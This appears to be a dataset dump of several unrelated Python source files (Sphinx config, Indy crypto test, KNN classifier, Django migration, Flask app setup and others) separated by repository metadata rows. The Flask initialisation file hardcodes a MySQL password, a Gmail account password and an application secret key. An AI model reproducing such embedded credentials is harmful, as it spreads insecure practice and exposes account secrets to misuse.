# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'whosaidwhat'
copyright = """2017, Shun Liang"""
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'whosaidwhatdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'whosaidwhat.tex',
'whosaidwhat Documentation',
"""Shun Liang""", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'whosaidwhat', 'whosaidwhat Documentation',
["""Shun Liang"""], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'whosaidwhat', 'whosaidwhat Documentation',
"""Shun Liang""", 'whosaidwhat',
"""A short description of the project.""", 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 31.995902
| 80
| 0.706289
|
a2326de2ae8316f73563e682730ce88d58bac3a8
| 1,924
|
py
|
Python
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 2
|
2021-08-23T15:20:22.000Z
|
2021-12-03T01:58:02.000Z
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger-archives/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 1
|
2018-02-22T10:04:41.000Z
|
2018-02-22T10:04:41.000Z
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 7
|
2018-01-03T20:45:48.000Z
|
2019-08-12T11:02:31.000Z
|
"""
Created on Jan 2, 2018
@author: nhan.nguyen
Verify that user cannot decrypt an anonymous encrypted
message with invalid wallet handle.
"""
import pytest
from indy import crypto
from indy.error import ErrorCode
from utilities import common, utils
from test_scripts.functional_tests.crypto.crypto_test_base \
import CryptoTestBase
class TestCryptoBoxSealOpenWithInvalidWalletHandle(CryptoTestBase):
@pytest.mark.asyncio
async def test(self):
# 1. Create wallet.
# 2. Open wallet.
self.wallet_handle = await common.create_and_open_wallet_for_steps(
self.steps, self.wallet_name, self.pool_name, credentials=self.wallet_credentials)
# 3. Create verkey.
self.steps.add_step("Create verkey")
my_verkey = await utils.perform(self.steps, crypto.create_key,
self.wallet_handle, "{}")
# 4. Create sealed crypto box.
self.steps.add_step("Create sealed crypto box")
msg = "Test crypto".encode()
encrypted_msg = await utils.perform(self.steps,
crypto.anon_crypt,
my_verkey, msg)
# 5. Open sealed crypto box with invalid wallet handle
# and verify that sealed crypto box cannot be opened.
self.steps.add_step("Open sealed crypto box with "
"invalid wallet handle and verify "
"that sealed crypto box cannot be opened")
error_code = ErrorCode.WalletInvalidHandle
await utils.perform_with_expected_code(self.steps,
crypto.anon_decrypt,
self.wallet_handle + 1,
my_verkey, encrypted_msg,
expected_code=error_code)
| 39.265306
| 94
| 0.587318
|
3a54d6d79f3278f05ce6262dc0c69aa1ac54c326
| 1,584
|
py
|
Python
|
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
# https://www.youtube.com/watch?v=3XPhmnf96s0&index=18&list=PLQVvvaa0QuDfKTOs3Keq_kaG2P55YRn5v
import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
def k_nearest_neighbors(data, predict, k=3):
if len(data) >= k:
warnings.warn('K is set to a value less than total voting group!')
distances = []
for group in data:
for features in data[group]:
euclidean_distance = np.linalg.norm(np.array(features)-np.array(predict))
distances.append([euclidean_distance, group])
votes = [i[1] for i in sorted(distances) [:k]]
vote_result = Counter(votes).most_common(1)[0][0]
return vote_result
# result = k_nearest_neighbors(dataset, new_features, k=3)
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?', -99999, inplace=True)
# drop useless data
df.drop(['id'], 1, inplace=True)
full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
train_set = {2:[], 4:[]}
test_set = {2:[], 4:[]}
train_data = full_data[:-int(test_size*len(full_data))]
test_data = full_data[-int(test_size*len(full_data)):]
for i in train_data:
train_set[i[-1]].append(i[:-1])
for i in test_data:
test_set[i[-1]].append(i[:-1])
correct = 0
total = 0
for group in test_set:
for data in test_set[group]:
vote = k_nearest_neighbors(train_set, data, k=5)
if group == vote:
correct += 1
total += 1
print ('Accuracy', correct/total)
# X = np.array(df.drop(['class'], 1))
# y = np.array(df['class'])
| 31.058824
| 94
| 0.673611
|
251c4524d117d4071525259a0990408b23598afa
| 1,597
|
py
|
Python
|
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019Bottom2Up
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | 1
|
2020-08-18T01:28:07.000Z
|
2020-08-18T01:28:07.000Z
|
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | null | null | null |
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Author: lyzhang
@Date:
@Description:
"""
import torch
import torch.nn as nn
from config import SEED, Tracking_With_GRU
from utils.file_util import load_data
from config import ALL_LABELS_NUM, Action2ids_path, LABEL_EMBED_SIZE
class Tracker(nn.Module):
""" Desc: tracker for tree lstm
"""
def __init__(self, hidden_size):
nn.Module.__init__(self)
torch.manual_seed(SEED)
self.hidden_size = hidden_size
input_size = 3 * self.hidden_size
self.rnn = nn.LSTMCell(input_size, hidden_size)
self.gru = nn.GRUCell(input_size, hidden_size)
self.label_emb = nn.Embedding(ALL_LABELS_NUM, LABEL_EMBED_SIZE)
self.label_emb.requires_grad = True
self.init_label = nn.Parameter(torch.randn(LABEL_EMBED_SIZE))
self.unk_label = nn.Parameter(torch.randn(LABEL_EMBED_SIZE))
self.label2ids = load_data(Action2ids_path)
def forward(self, stack, buffer_, state, label=None):
s1, s2 = stack[-1], stack[-2]
b1 = buffer_[0]
s2h, s2c = s2.chunk(2)
s1h, s1c = s1.chunk(2)
b1h, b1c = b1.chunk(2)
cell_input = (torch.cat([s2h, s1h, b1h])).view(1, -1)
# state1, state2 = state
if Tracking_With_GRU:
tracking_h = self.gru(cell_input, state)
tracking_out = tracking_h.view(1, -1)
else:
tracking_h, tracking_c = self.rnn(cell_input, state)
tracking_out = tracking_h.view(1, -1), tracking_c.view(1, -1)
return tracking_out
| 34.717391
| 74
| 0.625548
|
a3507320e0aedd17169703e354f16d6c202cd9c1
| 2,144
|
py
|
Python
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 13
|
2015-05-22T17:10:22.000Z
|
2021-07-15T16:45:19.000Z
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 758
|
2015-03-18T13:39:25.000Z
|
2022-03-31T13:14:09.000Z
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 16
|
2015-03-24T18:53:17.000Z
|
2020-10-22T21:30:02.000Z
|
# Generated by Django 2.0.13 on 2019-02-17 18:43
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Speaker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='As you would like it to appear in the conference program.', max_length=100, verbose_name='Name')),
('biography', models.TextField(blank=True, help_text="A little bit about you. Edit using <a href='http://warpedvisions.org/projects/markdown-cheat-sheet/' target='_blank'>Markdown</a>.", verbose_name='Biography')),
('biography_html', models.TextField(blank=True)),
('photo', models.ImageField(blank=True, help_text='Maximum file size: 10 MB', upload_to='speaker_photos', verbose_name='Photo')),
('twitter_username', models.CharField(blank=True, help_text='Your Twitter account', max_length=15)),
('annotation', models.TextField(blank=True, verbose_name='Annotation')),
('invite_email', models.CharField(blank=True, db_index=True, default='', max_length=200, verbose_name='Invite_email')),
('invite_token', models.CharField(blank=True, db_index=True, max_length=40, verbose_name='Invite token')),
('created', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='Created')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='speaker_profile', to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Speaker',
'ordering': ['name'],
'verbose_name_plural': 'Speakers',
},
),
]
| 53.6
| 231
| 0.649254
|
0408dee6e55e879e4ceb8ddd990f71f9ee55d965
| 815
|
py
|
Python
|
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
import mtrain
import neuraltrainer
import mtrainsimulator
if __name__ == "__main__":
"""
Main testing function, call the other functions from here to easily test each part of the
program
"""
#results = mtrainsimulator.simulate_games(num_games=100, debug=False)
#results = mtrainsimulator.simulate_games(debug=False, collect_data=False, num_games=100, file_name="PlayData/data4_12_250")
#results = neuraltrainer.train_neural_net(num_players=4, domino_size=12, file_name="PlayData/data4_12_250", debug=True)
results = mtrain.mexicantrain(num_players=4, domino_size=12, data_collection=False,
debug=False, modes=["Random", "Greedy", "Probability", "Neural"],
file_name="PlayData/data4_12_250")
print(results)
| 50.9375
| 128
| 0.694479
|
4bb72ff7ff3a05e6817bddee70fb8b1ef2e762bd
| 886
|
py
|
Python
|
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
from emrichen import Template, Context
FLAVORTOWN_YAML = """
flavours: !Loop
as: a
template: !Merge
- flavour_name: !Void
available: true
- !If
test: !IsString,Lookup a
then:
flavour_name: !Lookup a
else:
!Lookup a
over:
- peasoup
- hard liquor
- flavour_name: manifold
available: false
- John
"""
FLAVORTOWN_RESULT = {
"flavours": [
{
"available": True,
"flavour_name": "peasoup"
},
{
"available": True,
"flavour_name": "hard liquor"
},
{
"available": False,
"flavour_name": "manifold"
},
{
"available": True,
"flavour_name": "John"
}
]
}
def test_flavortown():
assert Template.parse(FLAVORTOWN_YAML).enrich(Context()) == [FLAVORTOWN_RESULT]
| 18.851064
| 83
| 0.514673
|
cf9018861b57ec91283cd68d30087fafafcebe09
| 754
|
py
|
Python
|
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_mail import Mail
app = Flask(__name__)
# Configuration of MySQL Server
app.secret_key = "qou3rhkjsafbi327y12$U@$JK@BKANOEIDQ"
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:P@ssw0rd@localhost/phonestoredb?charset=utf8'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# Configuration of Mail Server
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USERNAME'] = 'emailverifywebapp@gmail.com'
app.config['MAIL_PASSWORD'] = 'quoctan123'
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USE_SSL'] = False
db = SQLAlchemy(app=app)
login = LoginManager(app=app)
mail = Mail(app=app)
| 34.272727
| 107
| 0.785146
|
26e0ec62ff1c3357075e2c847954d2786dc5c564
| 1,057
|
py
|
Python
|
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | 2
|
2020-11-28T13:09:16.000Z
|
2020-12-05T21:01:07.000Z
|
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | null | null | null |
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import ReeccoinTestFramework
class CreateCache(ReeccoinTestFramework):
# Test network and test nodes are not required:
def setup_chain(self):
self.log.info("Initializing test directory " + self.options.tmpdir)
# Initialize PoS chain (it will automatically generate PoW chain too)
self._initialize_chain(toPosPhase=True)
def set_test_params(self):
self.num_nodes = 0
self.supports_cli = True
def setup_network(self):
pass
def run_test(self):
pass
if __name__ == '__main__':
CreateCache().main()
| 32.030303
| 86
| 0.735099
|
34713b61e430153c9a33d296c9ca375b24d928fa
| 3,837
|
py
|
Python
|
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 2
|
2019-10-23T03:37:59.000Z
|
2020-08-14T17:09:26.000Z
|
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | null | null | null |
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests the processing status."""
import unittest
from plaso.engine import processing_status
class ProcessStatusTest(unittest.TestCase):
"""Tests the process status."""
def testUpdateNumberOfErrors(self):
"""Tests the UpdateNumberOfWarnings function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfWarnings(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfWarnings(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfWarnings(10, 1)
def testUpdateNumberOfEventReports(self):
"""Tests the UpdateNumberOfEventReports function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventReports(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventReports(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventReports(10, 1)
def testUpdateNumberOfEvents(self):
"""Tests the UpdateNumberOfEvents function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEvents(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEvents(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEvents(10, 1)
def testUpdateNumberOfEventSources(self):
"""Tests the UpdateNumberOfEventSources function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventSources(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventSources(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventSources(10, 1)
def testUpdateNumberOfEventTags(self):
"""Tests the UpdateNumberOfEventTags function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventTags(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventTags(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventTags(10, 1)
class ProcessingStatusTest(unittest.TestCase):
"""Tests the processing status."""
# pylint: disable=protected-access
def testWorkersStatus(self):
"""Tests the workers_status property."""
status = processing_status.ProcessingStatus()
self.assertEqual(status.workers_status, [])
def testUpdateProcessStatus(self):
"""Tests the _UpdateProcessStatus function."""
process_status = processing_status.ProcessStatus()
status = processing_status.ProcessingStatus()
status._UpdateProcessStatus(
process_status, 'test', 'Idle', 12345, 2000000, 'test process',
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def testUpdateForemanStatus(self):
"""Tests the UpdateForemanStatus function."""
status = processing_status.ProcessingStatus()
status.UpdateForemanStatus(
'test', 'Idle', 12345, 2000000, 'test process',
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def testUpdateTasksStatus(self):
"""Tests the UpdateTasksStatus function."""
task_status = processing_status.TasksStatus()
status = processing_status.ProcessingStatus()
status.UpdateTasksStatus(task_status)
def testUpdateWorkerStatus(self):
"""Tests the UpdateWorkerStatus function."""
status = processing_status.ProcessingStatus()
status.UpdateWorkerStatus(
'test', 'Idle', 12345, 2000000, 'test process', 0,
0, 0, 0, 0, 0, 0, 0, 0, 0)
class TasksStatusTest(unittest.TestCase):
"""Tests the task status."""
def testInitialization(self):
"""Tests the __init__ function."""
task_status = processing_status.TasksStatus()
self.assertIsNotNone(task_status)
if __name__ == '__main__':
unittest.main()
| 30.452381
| 71
| 0.732864
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.